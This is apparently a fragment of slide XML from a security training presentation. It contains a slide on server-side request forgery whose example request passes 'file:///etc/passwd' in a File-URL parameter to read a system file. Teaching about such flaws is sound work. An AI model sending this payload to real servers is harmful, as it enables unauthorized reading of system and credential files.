              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF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310" name="Google Shape;310;p48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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p48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12" name="Google Shape;312;p48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8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14" name="Google Shape;31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8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16" name="Google Shape;316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350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8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18" name="Google Shape;318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925" y="3073200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8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20" name="Google Shape;320;p4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4025" y="3537325"/>
            <a:ext cx="421000" cy="3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